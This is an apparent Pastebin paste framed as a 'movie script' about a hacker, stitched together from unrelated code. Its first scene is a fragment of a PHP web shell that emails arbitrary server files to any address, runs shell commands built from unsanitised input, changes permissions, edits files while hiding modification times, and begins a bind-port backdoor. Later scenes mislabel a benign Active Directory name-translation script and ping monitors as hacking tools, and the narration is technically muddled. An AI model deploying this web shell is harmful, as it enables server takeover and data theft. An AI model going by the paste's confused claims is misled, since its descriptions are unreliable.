API tools faq
paste
Advertisement
Guest User

Movie script &&

a guest
Jun 15th, 2016
63
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.28 KB | None | 0 0
raw download clone embed print report
  1. Scene 1 - Exploit scenario w/ incomplete code, the author is himself one unknown hacker.
  2.  
  3.  
  4.  
  5. {
  6. $euserinfo = @posix_getpwuid(@posix_geteuid());
  7. $egroupinfo = @posix_getgrgid(@posix_getegid());
  8. echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
  9. }
  10. else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
  11. echo ws(3).$dir;
  12. echo ws(3).'( '.perms(@fileperms($dir)).' )';
  13. echo "<br>";
  14. echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
  15. echo "</b></font>";
  16. }
  17. else
  18. {
  19. echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
  20. echo "</td><td>";
  21. echo "<font face=tahoma size=-2 color=red><b>";
  22. echo ws(3).@substr(@php_uname(),0,120)."<br>";
  23. echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
  24. echo ws(3).@getenv("USERNAME")."<br>";
  25. echo ws(3).$dir;
  26. echo "<br>";
  27. echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
  28. echo "<br></font>";
  29. }
  30. echo "</font>";
  31. echo "</td></tr></table>";
  32. if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
  33. {
  34. $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
  35. err(6+$res);
  36. $_POST['cmd']="";
  37. }
  38. if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
  39. {
  40. if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
  41. else
  42. {
  43. $filename = @basename($_POST['loc_file']);
  44. $filedump = @fread($file,@filesize($_POST['loc_file']));
  45. fclose($file);
  46. $content_encoding=$mime_type='';
  47. compress($filename,$filedump,$_POST['compress']);
  48. $attach = array(
  49. "name"=>$filename,
  50. "type"=>$mime_type,
  51. "content"=>$filedump
  52. );
  53. if(empty($_POST['subj'])) { $_POST['subj'] = 'file from Anonymous user'; }
  54. if(empty($_POST['from'])) { $_POST['from'] = 'hardcore@microsoft.com'; }
  55. $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
  56. err(6+$res);
  57. $_POST['cmd']="";
  58. }
  59. }
  60. if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
  61. {
  62. $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
  63. }
  64. if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
  65. {
  66. switch($_POST['what'])
  67. {
  68. case 'own':
  69. @chown($_POST['param1'],$_POST['param2']);
  70. break;
  71. case 'grp':
  72. @chgrp($_POST['param1'],$_POST['param2']);
  73. break;
  74. case 'mod':
  75. @chmod($_POST['param1'],intval($_POST['param2'], 8));
  76. break;
  77. }
  78. $_POST['cmd']="";
  79. }
  80. if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
  81. {
  82. switch($_POST['what'])
  83. {
  84. case 'file':
  85. if($_POST['action'] == "create")
  86. {
  87. if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
  88. else {
  89. fclose($file);
  90. $_POST['e_name'] = $_POST['mk_name'];
  91. $_POST['cmd']="edit_file";
  92. echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
  93. }
  94. }
  95. else if($_POST['action'] == "delete")
  96. {
  97. if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
  98. $_POST['cmd']="";
  99. }
  100. break;
  101. case 'dir':
  102. if($_POST['action'] == "create"){
  103. if(mkdir($_POST['mk_name']))
  104. {
  105. $_POST['cmd']="";
  106. echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
  107. }
  108. else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
  109. }
  110. else if($_POST['action'] == "delete"){
  111. if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
  112. $_POST['cmd']="";
  113. }
  114. break;
  115. }
  116. }
  117. if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
  118. {
  119. if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
  120. if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
  121. else {
  122. echo $table_up3;
  123. echo $font;
  124. echo "<form name=save_file method=post>";
  125. echo ws(3)."<b>".$_POST['e_name']."</b>";
  126. echo "<div align=center><textarea name=e_text cols=121 rows=24>";
  127. echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
  128. fclose($file);
  129. echo "</textarea>";
  130. echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
  131. echo "<input type=hidden name=dir value=".$dir.">";
  132. echo "<input type=hidden name=cmd value=save_file>";
  133. echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
  134. echo "</div>";
  135. echo "</font>";
  136. echo "</form>";
  137. echo "</td></tr></table>";
  138. exit();
  139. }
  140. }
  141. if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
  142. {
  143. $mtime = @filemtime($_POST['e_name']);
  144. if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
  145. else {
  146. if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
  147. @fwrite($file,$_POST['e_text']);
  148. @touch($_POST['e_name'],$mtime,$mtime);
  149. $_POST['cmd']="";
  150. echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
  151. }
  152. }
  153.  
  154.  
  155.  
  156. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
  157.  
  158.  
  159.  
  160. Scene 2 - The hacker has access to everything when the 'server is pwned', in other words, the database, list of contacts, clients and personal information. There are many techniques to leverage access and the most common are sql attacks, but skilled hackers will look for backdoors and run attacks with APTs and RATs. The first step of an exploit is usually an email to hook the target with a crafted message and hyperlink he would open because the 'spam filter' didn't work out and he feels it's okay ()
  161.  
  162. Scene 3 - Script to identify active accounts in the target's directory or vulnerable computers in order to steal passwords and login information. The hacker won't need to change the -ip address every 30 secs, but he can do so to exploit further the network under his control. Although 30 secs is only possible for ddos attacks. ()
  163.  
  164.  
  165. [CmdletBinding()]
  166. param(
  167.  
  168. [parameter(Mandatory=$TRUE,Position=0)]
  169. [validateset("NT4","1779","SPN","canonical","GUID","DN","UPN","display","domainSimple","enterpriseSimple","canonicalEx")]
  170. [String] $OutputType,
  171.  
  172. [parameter(Mandatory=$TRUE,Position=1,ValueFromPipeline=$TRUE)]
  173. [String[]] $Name,
  174.  
  175. [validateset("NT4","1779","SPN","canonical","GUID","DN","UPN","display","domainSimple","enterpriseSimple","canonicalEx","SIDorSidHistory","unknown")]
  176. [String] $InputType="unknown",
  177.  
  178. [validateset("domain","server","GC")]
  179. [String] $InitType="GC",
  180.  
  181. [String] $InitName="",
  182.  
  183. [Switch] $ChaseReferrals,
  184.  
  185. [System.Management.Automation.PSCredential] $Credential
  186. )
  187.  
  188. begin {
  189.  
  190. # Hash table to simplify output type names and values
  191. $OutputNameTypes = @{
  192. "1779" = 1;
  193. "DN" = 1;
  194. "canonical" = 2;
  195. "NT4" = 3;
  196. "display" = 4;
  197. "domainSimple" = 5;
  198. "enterpriseSimple" = 6;
  199. "GUID" = 7;
  200. "UPN" = 9;
  201. "canonicalEx" = 10;
  202. "SPN" = 11;
  203. }
  204.  
  205. # Copy output type hash table and add two additional types
  206. $InputNameTypes = $OutputNameTypes.Clone()
  207. $InputNameTypes.Add("unknown", 8)
  208. $InputNameTypes.Add("SIDorSidHistory", 12)
  209.  
  210. # Same as with previous hash tables...
  211. $InitNameTypes = @{
  212. "domain" = 1;
  213. "server" = 2;
  214. "GC" = 3;
  215. }
  216.  
  217. # Accessor functions to simplify calls to NameTranslate
  218. function invoke-method([__ComObject] $object, [String] $method, $parameters) {
  219. $output = $object.GetType().InvokeMember($method, "InvokeMethod", $NULL, $object, $parameters)
  220. if ( $output ) { $output }
  221. }
  222. function get-property([__ComObject] $object, [String] $property) {
  223. $object.GetType().InvokeMember($property, "GetProperty", $NULL, $object, $NULL)
  224. }
  225. function set-property([__ComObject] $object, [String] $property, $parameters) {
  226. [Void] $object.GetType().InvokeMember($property, "SetProperty", $NULL, $object, $parameters)
  227. }
  228.  
  229. # Create the NameTranslate COM object
  230. $NameTranslate = new-object -comobject NameTranslate
  231.  
  232. # If -Credential, use InitEx to initialize it; otherwise, use Init
  233. if ( $Credential ) {
  234. $networkCredential = $Credential.GetNetworkCredential()
  235. try {
  236. invoke-method $NameTranslate "InitEx" (
  237. $InitNameTypes[$InitType],
  238. $InitName,
  239. $networkCredential.UserName,
  240. $networkCredential.Domain,
  241. $networkCredential.Password
  242. )
  243. }
  244. catch [System.Management.Automation.MethodInvocationException] {
  245. write-error $_
  246. exit
  247. }
  248. finally {
  249. remove-variable networkCredential
  250. }
  251. }
  252. else {
  253. try {
  254. invoke-method $NameTranslate "Init" (
  255. $InitNameTypes[$InitType],
  256. $InitName
  257. )
  258. }
  259. catch [System.Management.Automation.MethodInvocationException] {
  260. write-error $_
  261. exit
  262. }
  263. }
  264.  
  265. # If -ChaseReferrals, set the object's ChaseReferral property to 0x60
  266. if ( $ChaseReferrals ) {
  267. set-property $NameTranslate "ChaseReferral" (0x60)
  268. }
  269.  
  270. # The NameTranslate object's Set method specifies the name to translate and
  271. # its input format, and the Get method returns the name in the output format
  272. function translate-adname2([String] $name, [Int] $inputType, [Int] $outputType) {
  273. try {
  274. invoke-method $NameTranslate "Set" ($inputType, $name)
  275. invoke-method $NameTranslate "Get" ($outputType)
  276. }
  277. catch [System.Management.Automation.MethodInvocationException] {
  278. write-error "'$name' - $($_.Exception.InnerException.Message)"
  279. }
  280. }
  281. }
  282.  
  283. process {
  284. Foreach($item in $name){
  285. translate-adname2 $name $InputNameTypes[$InputType] $OutputNameTypes[$OutputType]
  286. }
  287. }
  288. }
  289.  
  290. Scene 4 - The hacker is caught once he decided installing this new 'software' from the hacked database, it's okay doing it but he didn't disable automatic update, trying to stop this immediately is not enough, he is connected to the Internet and an inevitable error message was delivered to the IT guy to the email admin@autoupdate-db.com
  291.  
  292. He screwed it! This is what he can see on his desktop before panicking ()
  293.  
  294.  
  295.  
  296. #=== PARAMETERS change them here
  297. # add ip / hostname separated by white space
  298. HOSTS="www.autoupdate-db.com"
  299. # no ping request
  300. COUNT=40
  301. # email report when
  302. #SUBJECT="Ping failed"
  303. #EMAILID="admin@autoupdate-db.com"
  304. #=== Local vars (do not change them)
  305. # Cron-friendly: Automaticaly change directory to the current one
  306. cd $(dirname "$0")
  307. # Current script filename
  308. SCRIPTNAME=$(basename "$0")
  309. # Current date and time
  310. today=$(date '+%Y-%m-%d')
  311. currtime=$(date '+%H:%M:%S')
  312. #=== Help message
  313. if [[ "$@" =~ "--help" ]]; then
  314. echo "Usage: bash $SCRIPTNAME
  315. Check the rate of packets loss and output the result in a file named plwatch.txt in the same directory as this script.
  316. Note: this script is cron-friendly, so you can add it to a cron job to regularly check your packets loss.
  317. "
  318. exit
  319. fi
  320. #=== Main script
  321. for myHost in $HOSTS
  322. do
  323. msg=$(ping -c $COUNT $myHost | grep 'loss')
  324. echo "[$today $currtime] ($myHost $COUNT) $msg" >> plwatch.txt
  325. #count=$(ping -c $COUNT $myHost | grep 'received' | awk -F',' '{ print $2 }' | awk '{ print $1 }')
  326. #if [ $count -eq 0 ]; then
  327. # 100% failed
  328. # echo "Host : $myHost is down (ping failed) at $(date)" | mail -s "$SUBJECT" $EMAILID
  329. #fi
  330.  
  331. Scene 4 - This is what he can see in another window ()
  332.  
  333.  
  334. - - - 8< - - -
  335.  
  336. #address=192.168.1.99 # forced bad address
  337. address=83.170.69.51 # www.autoupdate-db.com
  338. internet=1 # default to internet is up
  339.  
  340. x=0
  341.  
  342. while true;
  343. do
  344. # %a Day of Week, textual
  345. # %b Month, textual, abbreviated
  346. # %d Day, numeric
  347. # %r Timestamp AM/PM
  348. echo -n $(date +"%a, %b %d, %r") "-- "
  349. ping -c 1 ${address} > /tmp/ping.$
  350. if [[ $? -ne 0 ]]; then
  351. if [[ ${internet} -eq 1 ]]; then # edge trigger -- was up now down
  352. echo -n $(say "Internet down") # OSX Text-to-Speech
  353. echo -n "Internet DOWN"
  354. else
  355. echo -n "... still down"
  356. fi
  357. internet=0
  358. else
  359. if [[ ${internet} -eq 0 ]]; then # edge trigger -- was down now up
  360. echo -n $(say "Internet back up") # OSX Text-To-Speech
  361. fi
  362. internet=1
  363. fi
  364. cat /tmp/ping.$ | head -2 | tail -1
  365. sleep 30 ; # sleep: 60 seconds = 1 min
  366. done
  367.  
  368. - - - 8< - - -
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!